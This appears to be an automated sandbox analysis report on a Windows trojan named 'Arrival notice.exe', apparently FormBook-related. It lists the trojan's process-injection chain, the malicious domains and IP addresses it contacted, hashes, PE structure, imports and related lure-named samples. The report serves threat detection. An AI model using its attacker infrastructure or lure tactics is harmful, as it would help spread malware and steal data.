            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials12
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            [Behavior graph: ID 1527837; sample: Arrival notice.exe; start date: 07/10/2024; architecture: WINDOWS; score: 100. Process chain: Arrival notice.exe -> svchost.exe (started) -> JGgOTaRBeKg.exe (injected) -> mobsync.exe (started) -> firefox.exe (started).]

            Source | Detection | Scanner | Label
            Arrival notice.exe | 55% | ReversingLabs | Win32.Trojan.Autoitinject
            Arrival notice.exe | 45% | Virustotal |
            Arrival notice.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner
            www.kilbmn.xyz | 1% | Virustotal
            galaxyslot88rtp.lat | 0% | Virustotal
            www.federall.store | 1% | Virustotal
            chalet-tofane.net | 8% | Virustotal
            030002304.xyz | 3% | Virustotal
            wearenotgoingback.info | 3% | Virustotal
            platinumkitchens.info | 9% | Virustotal
            animekuid.xyz | 3% | Virustotal
            nng65.top | 1% | Virustotal
            www.wearenotgoingback.info | 0% | Virustotal
            www.animekuid.xyz | 3% | Virustotal
            www.galaxyslot88rtp.lat | 0% | Virustotal
            www.platinumkitchens.info | 0% | Virustotal
            www.chalet-tofane.net | 2% | Virustotal
            www.nng65.top | 1% | Virustotal
            www.mivasectomy.net | 1% | Virustotal
            www.030002304.xyz | 3% | Virustotal
            IP | Domain | Country | ASN | ASN Name | Malicious
            162.0.238.246 | www.kilbmn.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
            62.149.128.40 | chalet-tofane.net | Italy | 31034 | ARUBA-ASNIT | true
            38.47.233.65 | nng65.top | United States | 174 | COGENT-174US | true
            65.21.196.90 | 030002304.xyz | United States | 199592 | CP-ASDE | true
            45.130.41.13 | www.federall.store | Russian Federation | 198610 | BEGET-ASRU | true
            76.223.105.230 | wearenotgoingback.info | United States | 16509 | AMAZON-02US | true
            46.17.172.49 | galaxyslot88rtp.lat | Germany | 47583 | AS-HOSTINGERLT | true
            194.58.112.174 | www.albero-dveri.online | Russian Federation | 197695 | AS-REGRU | true
            3.33.130.190 | mivasectomy.net | United States | 8987 | AMAZONEXPANSIONGB | true
            203.175.9.128 | animekuid.xyz | Indonesia | 131303 | FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPH | true
            172.81.61.224 | www.moritynomxd.xyz | United States | 22552 | ESITEDUS | true
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1527837
            Start date and time: 2024-10-07 10:36:34 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 10m 9s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 18
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: Arrival notice.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@7/2@16/11
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 86%
            • Number of executed functions: 55
            • Number of non-executed functions: 313
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

            Time | Type | Description
            04:38:47 | API Interceptor | 8972270x Sleep call for process: mobsync.exe modified
                                                                  • www.qqa84.top/2qp8/
                                                                  PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  PI 30_08_2024.exeGet hashmaliciousFormBookBrowse
                                                                  • www.qqa84.top/2qp8/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.albero-dveri.online-pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 194.58.112.174
                                                                  AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  September Order.exeGet hashmaliciousFormBookBrowse
                                                                  • 194.58.112.174
                                                                  www.federall.storeBL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                  • 45.130.41.13
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CP-ASDEhttps://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                                  • 65.21.235.194
                                                                  rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 65.21.196.90
                                                                  https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                  • 65.21.85.206
                                                                  044f.pdf.scrGet hashmaliciousRMSRemoteAdminBrowse
                                                                  • 65.21.245.7
                                                                  Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  https://quatangff-garena.pw.io.vn/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 65.21.235.194
                                                                  file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                  • 65.21.18.51
                                                                  Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                  • 65.21.196.90
                                                                  https://claim.eventsmidasbuys.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 65.21.235.194
                                                                  NAMECHEAP-NETUShttp://buddycities.com/Get hashmaliciousUnknownBrowse
                                                                  • 162.255.119.35
                                                                  http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                                                  • 192.64.119.229
                                                                  http://vpnpanda.org/Get hashmaliciousUnknownBrowse
                                                                  • 162.255.119.66
                                                                  172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  • 198.54.117.242
                                                                  http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                                                                  • 63.250.43.7
                                                                  http://reportrix.co.uk/assets/assetfile/js/main.jsGet hashmaliciousUnknownBrowse
                                                                  • 104.219.248.24
                                                                  presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 199.192.19.19
                                                                  1.cmdGet hashmaliciousUnknownBrowse
                                                                  • 192.64.119.55
                                                                  -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                  • 162.213.249.216
                                                                  1.cmdGet hashmaliciousUnknownBrowse
                                                                  • 192.64.119.55
                                                                  COGENT-174USPURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                  • 38.47.232.144
                                                                  http://tiktok1api.goodpay.buzz/Get hashmaliciousUnknownBrowse
                                                                  • 154.39.150.40
                                                                  http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 38.91.45.7
                                                                  2qWIvXORVU.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 38.43.41.200
                                                                  na.elfGet hashmaliciousSliverBrowse
                                                                  • 38.55.193.31
                                                                  na.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.51.219.197
                                                                  PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                  • 38.240.41.28
                                                                  ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                                                                  • 149.92.43.113
                                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 38.162.177.151
                                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 149.52.168.147
                                                                  ARUBA-ASNITna.elfGet hashmaliciousMiraiBrowse
                                                                  • 31.14.139.69
                                                                  novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                  • 95.110.195.186
                                                                  SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                  • 62.149.128.40
                                                                  https://h567268.linp067.arubabusiness.it/SI1892190290/amGet hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://h567268.linp067.arubabusiness.it/SI1892190290/Get hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://h567268.linp067.arubabusiness.it/BOKMANDOKL/am/infospage.phpGet hashmaliciousUnknownBrowse
                                                                  • 80.88.87.86
                                                                  https://terios.shop/Get hashmaliciousUnknownBrowse
                                                                  • 217.61.13.96
                                                                  w91DR2B3Pz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 80.211.144.156
                                                                  List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  • 62.149.128.40
                                                                  Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                                                  • 62.149.128.40
                                                                  No context
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\mobsync.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1211596417522893
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                  MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                  SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                  SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                  SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Process:C:\Users\user\Desktop\Arrival notice.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288768
                                                                  Entropy (8bit):7.992362607736109
                                                                  Encrypted:true
                                                                  SSDEEP:6144:OBqFe4SoimNekhuDuZKs+aaSL9rFTRKOA2ArGNwFk7RN7ssQRK:nSlAekQ3spaSRJMOA2AriFRNoXK
                                                                  MD5:7C8F8F1F1A531DDA873E8B7FDCAA03D5
                                                                  SHA1:772BFFB2770FC3A9D291816C7DA4A670565265BB
                                                                  SHA-256:E2917EE54C69F4F0C1C016EA3B03CB0621FF3284626422143A9DD8AAF0F59893
                                                                  SHA-512:5944CD5626B6C4356E9CA78C1D28FCA38B3E34EABECEBC79AA5A9A4ED1F9052A297BEE51D4CBB43CB4E8898D608D703D9C6344B6EA5748B9CB8007ABE4436221
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.55172829743465
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                  • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Arrival notice.exe
                                                                  File size:1'401'539 bytes
                                                                  MD5:50397bfab2624cccb8c7ae8ce667048c
                                                                  SHA1:719db4c99ee56ff658a1b477e589dffbc37fa582
                                                                  SHA256:ebd5341fb10c3fd26e72d2664961d062bdd4982fe95c327a32aeb4784742e9d8
                                                                  SHA512:95fb98f1ccd3678fa63a480ac527a7ceaf21d5a115fce6f1fdcae48fc0c87d87196d91c4e6a00c3407cb1061f0c94ea50bc372758731d09495c30796b1d49dab
                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLGND+4ardQOHeT2T9iwXF1y/WxEh67:f3v+7/5QL+dar6EeTan114Sm67
                                                                  TLSH:5355F212B7D680B2D9A338B0293BE327EB3575190327C49BA7E52E778F211509B37761
                                                                  Icon Hash:1733312925935517
                                                                  Entrypoint:0x416310
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                  Instruction
                                                                  call 00007FF3B46F15DCh
                                                                  jmp 00007FF3B46E53AEh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007FF3B46E553Ah
                                                                  cmp edi, eax
                                                                  jc 00007FF3B46E56DAh
                                                                  cmp ecx, 00000100h
                                                                  jc 00007FF3B46E5551h
                                                                  cmp dword ptr [004A94E0h], 00000000h
                                                                  je 00007FF3B46E5548h
                                                                  push edi
                                                                  push esi
                                                                  and edi, 0Fh
                                                                  and esi, 0Fh
                                                                  cmp edi, esi
                                                                  pop esi
                                                                  pop edi
                                                                  jne 00007FF3B46E553Ah
                                                                  pop esi
                                                                  pop edi
                                                                  pop ebp
                                                                  jmp 00007FF3B46E599Ah
                                                                  test edi, 00000003h
                                                                  jne 00007FF3B46E5547h
                                                                  shr ecx, 02h
                                                                  and edx, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007FF3B46E555Ch
                                                                  rep movsd
                                                                  jmp dword ptr [00416494h+edx*4]
                                                                  nop
                                                                  mov eax, edi
                                                                  mov edx, 00000003h
                                                                  sub ecx, 04h
                                                                  jc 00007FF3B46E553Eh
                                                                  and eax, 03h
                                                                  add ecx, eax
                                                                  jmp dword ptr [004163A8h+eax*4]
                                                                  jmp dword ptr [004164A4h+ecx*4]
                                                                  nop
                                                                  jmp dword ptr [00416428h+ecx*4]
                                                                  nop
                                                                  mov eax, E4004163h
                                                                  arpl word ptr [ecx+00h], ax
                                                                  or byte ptr [ecx+eax*2+00h], ah
                                                                  and edx, ecx
                                                                  mov al, byte ptr [esi]
                                                                  mov byte ptr [edi], al
                                                                  mov al, byte ptr [esi+01h]
                                                                  mov byte ptr [edi+01h], al
                                                                  mov al, byte ptr [esi+02h]
                                                                  shr ecx, 02h
                                                                  mov byte ptr [edi+02h], al
                                                                  add esi, 03h
                                                                  add edi, 03h
                                                                  cmp ecx, 08h
                                                                  jc 00007FF3B46E54FEh
                                                                  Programming Language:
                                                                  • [ASM] VS2008 SP1 build 30729
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [C++] VS2008 SP1 build 30729
                                                                  • [ C ] VS2005 build 50727
                                                                  • [IMP] VS2005 build 50727
                                                                  • [ASM] VS2008 build 21022
                                                                  • [RES] VS2008 build 21022
                                                                  • [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, 